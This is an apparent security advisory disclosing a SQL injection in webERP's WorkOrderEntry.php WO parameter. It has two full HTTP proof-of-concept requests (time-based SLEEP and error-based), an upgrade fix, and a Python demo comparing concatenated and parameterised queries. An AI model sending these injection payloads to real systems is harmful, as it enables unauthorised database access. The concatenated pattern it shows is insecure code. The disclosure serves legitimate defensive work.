webERP <=4.08.4 SQL Injection Vulnerability

webERP is a mature open-source ERP system providing best-practice, multi-user business administration and accounting tools over the web. The vulnerability lies in the WO (work order) parameter handled by WorkOrderEntry.php in the Manufacturing menu. Because the WO parameter is not validated before use, a malicious user can inject an SQL query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

Solution

Upgrade to the latest version, available at http://sourceforge.net/projects/web-erp/
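To illustrate the defensive side of this finding, the following sketch contrasts a hypothetical lookup that splices the WO value straight into SQL with one that validates WO as an integer and binds it as a parameter, exercising both WO payloads from the proof of concept above. This is an added example, not webERP's own code; the table, column names and SQLite backend are constructed stand-ins.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a work order table (not webERP's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE workorders (wo INTEGER PRIMARY KEY, loccode TEXT)")
    con.executemany("INSERT INTO workorders VALUES (?, ?)", [(33, "MEL"), (34, "MEL")])
    return con

def lookup_vulnerable(con, wo):
    """Hypothetical vulnerable pattern: the raw WO parameter becomes part of the SQL text."""
    sql = "SELECT wo, loccode FROM workorders WHERE wo='" + wo + "'"
    return con.execute(sql).fetchall()

def lookup_hardened(con, wo):
    """Hardened form: WO must be a short integer literal and is bound, never concatenated."""
    if not re.fullmatch(r"[0-9]{1,10}", wo):
        raise ValueError("WO must be a positive integer")
    sql = "SELECT wo, loccode FROM workorders WHERE wo=?"
    return con.execute(sql, (int(wo),)).fetchall()

def run_payload(fn, con, wo):
    """Return ('rows', rows) on success, or (exception name, message) when the lookup fails."""
    try:
        return ("rows", fn(con, wo))
    except (ValueError, sqlite3.OperationalError) as exc:
        return (type(exc).__name__, str(exc))

if __name__ == "__main__":
    con = make_db()
    payloads = ["33", "33'", "33' AND SLEEP(5) AND '1'='1"]  # legitimate value + the two PoC values
    for wo in payloads:
        # The spliced version hands the attacker's quote to the SQL parser (the error-based case);
        # the hardened version rejects anything that is not a plain work order number.
        print(repr(wo), "vulnerable:", run_payload(lookup_vulnerable, con, wo))
        print(repr(wo), "hardened:  ", run_payload(lookup_hardened, con, wo))
```

With the real MySQL backend the SLEEP(5) payload would delay the response instead of failing; SQLite simply has no such function, which is enough to show that the payload reached the query parser.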

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !